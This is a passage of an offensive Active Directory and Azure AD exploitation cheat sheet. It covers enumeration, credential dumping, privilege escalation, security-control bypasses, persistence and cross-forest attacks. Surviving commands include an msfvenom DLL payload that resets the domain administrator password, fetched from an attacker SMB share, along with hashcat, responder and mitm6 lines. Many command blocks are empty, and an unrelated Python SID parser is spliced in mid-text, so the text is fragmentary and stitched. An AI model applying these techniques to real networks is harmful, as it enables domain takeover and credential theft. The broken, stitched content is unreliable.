AD Exploitation Cheat Sheet by RistBS
Powershell tools :
nishang has multiple useful scripts for Windows pentesting in a PowerShell environment.
powerview is a script from powersploit that allows enumeration of the AD architecture for potential lateral movement.
Enumeration tools :
AD exploitation toolkit :
Dumping Tools :
Listener Tool :
Powershell Components
Powershell Tricks
PS-Session :
allows anyone with credentials to connect to any machine and any configuration
[ ! ] this action requires credentials.
Find user with SPN
using :
using :
Trusts Enumeration
MapTrust :
Domain trusts for the current domain :
using :
using :
Forest Enumeration
Details about the current forest :
GPO enumeration
List of GPO
ACL and ACE enumeration
Enumerate All ACEs
Enumerate users and permissions
Verify if the user already has a SPN :
using :
using :
LDAP Enumeration
find service accounts
Enumeration with ldapsearch as authenticated user
Enumeration with ldapdomaindump (authenticated) with nice output
Enumeration with nmap scripts
SMB Enumeration
enumeration with crackmapexec as unauthenticated
enumeration with crackmapexec (authenticated)
enumeration with kerbrute, against Kerberos pre-auth bruteforcing:
by default, kerbrute uses the most secure mode (18 = sha1) to pull some hashes. Using the downgrade option we can pull the deprecated encryption type version (23 = rc4hmac). Or use getNPusers to get some hashes instead, it's safer!
provide a password or a list of passwords to test against users
Enumerate some users
Password Spraying on the domain
Dump Domain, Groups and Users using Bloodhound-Python:
Setting up Bloodhound:
Global Structure :
S-1-5-21: S refers to the SID (Security Identifier)
40646273370-24341400410-2375368561: Domain or Local Computer Identifier
User SID Structure :
S-1-5-21-40646273370-24341400410-2375368561: Domain SID
using :
using :
the value "20000" in lookupsid indicates how many RIDs will be tested
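As an added illustration of the SID layout described above (this is example code written for this page, not a tool from the cheat sheet), the following Python splits a SID string into revision, identifier authority and sub-authorities, isolates the domain (or local computer) identifier, and names the RID when it is a well-known one. Being able to do this quickly is useful on the defensive side when reviewing ACLs or event logs. The sample SID is constructed; the well-known RID table holds only standard Microsoft-defined values.

```python
"""Decompose a Windows security identifier (SID) string into its parts.

Added example for the "Global Structure" / "User SID Structure" notes;
illustrative code for this page, not a tool from the cheat sheet.
The sample SID used below is constructed.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Well-known relative identifiers (RIDs) worth recognising when reviewing
# logs or ACLs: the RID is the last sub-authority of a domain SID.
WELL_KNOWN_RIDS = {
    500: "Administrator (built-in)",
    501: "Guest (built-in)",
    502: "krbtgt",
    512: "Domain Admins",
    513: "Domain Users",
    516: "Domain Controllers",
    518: "Schema Admins",
    519: "Enterprise Admins",
}

_SID_RE = re.compile(r"^S-(\d+)-(\d+)((?:-\d+)*)$")


@dataclass
class ParsedSid:
    revision: int
    identifier_authority: int
    sub_authorities: List[int]
    domain_sid: Optional[str]   # "S-1-5-21-x-y-z" for domain/local-computer SIDs, else None
    rid: Optional[int]          # last sub-authority of a domain principal SID, else None
    well_known_name: Optional[str]


def parse_sid(sid: str) -> ParsedSid:
    """Parse an "S-R-I-S..." string and split off the domain part and the RID."""
    m = _SID_RE.match(sid)
    if not m:
        raise ValueError(f"not a SID string: {sid!r}")
    revision = int(m.group(1))
    authority = int(m.group(2))
    subs = [int(x) for x in m.group(3).split("-") if x]
    # Each sub-authority is an unsigned 32-bit value; reject anything wider.
    for s in subs:
        if s > 0xFFFFFFFF:
            raise ValueError(f"sub-authority {s} exceeds 32 bits in {sid!r}")
    domain_sid = None
    rid = None
    name = None
    # S-1-5-21-<a>-<b>-<c>[-<rid>]: NT authority (5), "non-unique" (21),
    # then three 32-bit values identifying the domain or local computer.
    if authority == 5 and len(subs) >= 4 and subs[0] == 21:
        domain_sid = "S-%d-%d-%s" % (revision, authority, "-".join(str(x) for x in subs[:4]))
        if len(subs) >= 5:
            rid = subs[-1]
            name = WELL_KNOWN_RIDS.get(rid)
    return ParsedSid(revision, authority, subs, domain_sid, rid, name)


def same_domain(sid_a: str, sid_b: str) -> bool:
    """True when two principal SIDs carry the same domain identifier."""
    a, b = parse_sid(sid_a), parse_sid(sid_b)
    return a.domain_sid is not None and a.domain_sid == b.domain_sid


if __name__ == "__main__":
    # Constructed sample: a domain SID plus the RID of the built-in Administrator.
    sample = "S-1-5-21-1004336348-1177238915-682003330-500"
    p = parse_sid(sample)
    print(f"domain SID : {p.domain_sid}")
    print(f"RID        : {p.rid} ({p.well_known_name})")
```

The 32-bit check matters in practice: each sub-authority is a DWORD, so a value with more than ten decimal digits cannot be a real SID and usually indicates a copy-paste or extraction error.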
Privilege Escalation
Token Impersonation
The token impersonation technique allows an attacker to impersonate a user by stealing that user's token; such tokens exist because of SSO processes, interactive logons, running processes and so on.
using :
list tokens
Start a new process with the token of a user
process token manipulation
using :
load incognito and list tokens :
impersonate token of "NT AUTHORITY\SYSTEM" :
Enumerate kerberoastable user
using :
using
crack the hash :
Enumerate asreproastable user
cracking the hash :
hashcat -m 18200 -a 0 hash wordlist.txt --force
Enumerate users in this group :
This attack consists of injecting an arbitrary malicious DLL and restarting the dns.exe service; since the DC also serves DNS, this elevates our privileges to DA.
DLL File :
you can also create a DLL file using msfvenom : msfvenom -p windows/x64/exec cmd='net user administrator aked /domain' -f dll > evil.dll it'll execute net user administrator aked /domain with SYSTEM privileges
set the remote DLL path into the Windows Registry
\\10.10.14.33\share\evil.dll : SMB Share.
restart DNS service
Lateral Movement
uses kerberos auth
Credentials Dumping
parse creds with mimikatz
you can do it locally with mimikatz using : sekurlsa::logonpasswords.
Abusing DRSUAPI for NTDS dumping
Abusing VSS for NTDS dumping
using Crackmapexec :
you can do it manually too.
dump DPAPI BK
Decrypt DPAPI MK
decrypting protected file using MK
crack DPAPI master key with JTR
you can use mimikatz with this command : lsadump::secrets
save SYSTEM hive and SAM in another directory
or just use : lsadump::sam
[ 📝 ] Notes : you can dump SAM and LSA with crackmapexec or secretdump using these commands :
Dump Registry Remotely and Directly
[ ❓ ] What is the Registry? : the Registry is divided into several sections called hives. A registry hive is a top-level registry key predefined by the Windows system to store registry keys for specific objectives. Each registry hive has specific objectives; there are 6 registry hives, HKCU, HKLM, HKCR, HKU, HKCC and HKPD. The most interesting registry hives in pentesting are HKU and HKLM.
HKEY_LOCAL_MACHINE, called HKLM, includes three keys: SAM, SYSTEM, and SECURITY.
dump SYSTEM and SECURITY remotely from HKLM :
dump HKU registry remotely with hashes argument :
Read GMSA Password
gMSA dumping:
LM :
NT :
NTLMv1 :
NTLMv2 :
note : some hashcat hash types depend on the etype
Bruteforce AD Password
Custom Username and Password wordlist
default password list (pwd_list) : Autumn Spring Winter Summer
create passwords using bash & hashcat :
default username list (users.list) :
create custom usernames using username-anarchy :
Pivot with WDFW via custom rules
allow connections to localport
Local/Remote ports can be forwarded using SMB pipes. You can use or for that.
Invoke-Piper : used to forward local or remote ports
Invoke-SocksProxy : used for dynamic port forwarding
Case 1 Local port forwarding through pipe forPivot: -L 33389:127.0.0.1:3389
SERVER SIDE :
CLIENT SIDE :
Case 2 Admin only remote port forwarding through pipe forPivot: -R 33389:127.0.0.1:3389
SERVER SIDE :
CLIENT SIDE :
Case 3 Dynamic port forwarding with Invoke-SocksProxy with forPivot as NamedPipe: -D 3333
SERVER SIDE :
CLIENT SIDE :
SharpSocks is mostly used in C2 frameworks and works with C2 implants
build a server:
RDP Tunneling via DVC
sharing drives:
map the drives:
create a server with SSFD.exe
Redirect SSF port with DVC server:
SSFD as a SOCKS proxy
SIDHistory Injection
AdminSDHolder and SDProp
[ ❓ ] : With DA privileges (Full Control/Write permissions) on the AdminSDHolder object, it can be used as a backdoor/persistence mechanism by adding a user with Full Permissions (or other interesting permissions) to the AdminSDHolder object. In 60 minutes (when SDPROP runs), the user will be added with Full Control to the AC of groups like Domain Admins without actually being a member of it.
using :
using :
Run SDProp manually
ACLs and ACEs Abusing
list all groups to which the user belongs and has explicit access rights
Enhanced Security Bypass
AntiMalware Scan Interface
patching AMSI from Powershell6 :
ConstrainLanguageMode
Bypass CLM using runspace:
Just Enough Administration
show current language level :
Bypass JEA in ConstrainedLanguage :
ExecutionPolicy
bypass EP using encoding :
RunAsPPL for Credentials Dumping
[ ❓ ] : RunAsPPL is an additional LSA protection to prevent memory reading and code injection by non-protected processes.
bypass RunAsPPL with mimikatz :
you can try obfuscation techniques on this command. To learn more about ETW see my course
OWA EWS and EAS Password Spraying
using :
using :
GAL and OAB Extraction
GAL (Global Address Book) Extraction
using powershell :
OAB (Offline Address Book) Extraction
extract the OAB.XML file, which contains the records
extract LZX compressed file
using :
using the PushSubscription feature, a user is able to capture the NTLM authentication data of an Exchange server with a simple call to the "PushSubscription" API
is the name given to CVE-2021-26855 that allows an attacker to bypass authentication and impersonate users on MS Exchange servers
using metasploit:
this CVE allows RCE on EWS through fixed cryptographic keys
Get Values for RCE :
ViewStateUserKey : document.getElementById("_VIEWSTATEGENERATOR").value
ViewStateGenerator : ASP.NET_SessionId
UNC Path Injection
[ ❓ ] : the Uniform Naming Convention allows the sharing of resources on a network via a very precise syntax: \\IP-Server\shareName\Folder\File
launch responder : responder -I eth0
MC-SQLR Poisoning
The SQL Server Resolution Protocol is a simple application-level protocol that is used for the transfer of requests and responses between clients and database server discovery services.
we captured the hash of the Administrator with this VBA script.
DML, DDL and Logon Triggers
[ ❓ ] : Triggers are a stored procedure that automatically executes when an event occurs in the SQL Server.
Data Definition Language (DDL) – Executes on Create, Alter and Drop statements and some system stored procedures.
Data Manipulation Language (DML) – Executes on Insert, Update and Delete statements.
Logon Triggers – Executes on a user logon.
Triggers Listing
list All triggers
list triggers for a database
list DDL and DML triggers on an instance using powershell
use DML triggers for persistence
use DDL triggers for persistence
use Logon triggers for persistence
Forest Persistence
DCShadow temporarily registers a new domain controller in the target domain and uses it to "push" attributes like SIDHistory, SPNs... onto specified objects without leaving change logs for the modified object!
⚠️ Requirements :
DA privileges are required to use DCShadow.
The attacker's machine must be part of the root domain.
The attack needs 2 instances on a compromised machine :
first instance : start RPC servers with SYSTEM privileges and specify the attributes to be modified
second instance : with enough DA privileges to push the values :
Cross Forest Attacks
Dumping Trust Key
Forging IR-TGT using Trust key
get TGS for CIFS service
use TGS for CIFS service
Using KRBTGT hash
Azure Active Directory
AZ User Enumeration
connection to Azure Active Directory with Connect-MsolService.
this command allows enumeration with MFA (Multi-Factor Authentication)
locate Azure AD Connect Server
Enumeration using AZ CLI
Storage Enumeration
blob storage enumeration
create a new user
Executes a command on a specified VM
⚠️ Requirements :
Admin privileges of ADFS server
Obtain ADFS Public Certificate:
Obtain IdP Name:
Obtain Role Name:
a toolkit to exploit Golden SAML can be found
Golden SAML is similar to golden ticket and affects the Kerberos protocol. Like the Golden Ticket, the Golden SAML allows an attacker to access resources protected by SAML agents (examples: Azure, AWS, vSphere, Okta, Salesforce, ...) with elevated privileges through a golden ticket.
ShockNAwe:
Remotely extracts the AD FS configuration settings
WhiskeySAML:
Remotely extract AD FS configuration settings
PRT Manipulation
PassThePRT
check AzureAdJoined Status and download Mimikatz:
Looking for prt and KeyValue:
use APKD function to decode KeyValue and save "Context" and "DerivedKey" value:
Forge PRT-Cookie using :
Generate JWT
MSOL Service Account
you can dump the MSOL Service account with used by Azure AD Connect Sync and launch a DCSync attack with the dumped credentials
DCSync with MSOL account
Domain Level Attribute
MachineAccountQuota (MAQ) Exploitation
use crackmapexec (CME) with maq module :
cme ldap $dc -d $DOMAIN -u $USER -p $PASSWORD -M maq
BadPwdCount
Abusing IPv6 in AD
sending ICMPv6 packet to the target using ping6 :
ping6 -c 3 <target>
scanning IPv6 address using nmap :
nmap -6 -sCV dead:beef:0000:0000:b885:d62a:d679:573f --max-retries=2 --min-rate=3000 -Pn -T3
tips for adapting tools for ipv6 :
you can replace the AF_INET value with AF_INET6 from the Python socket library :
Rogue DHCP
mitm6 -i eth0 -d 'domain.job.local'
IOXIDResolver Interface Enumeration
it's a little script that enumerates addresses in the NetworkAddr field with level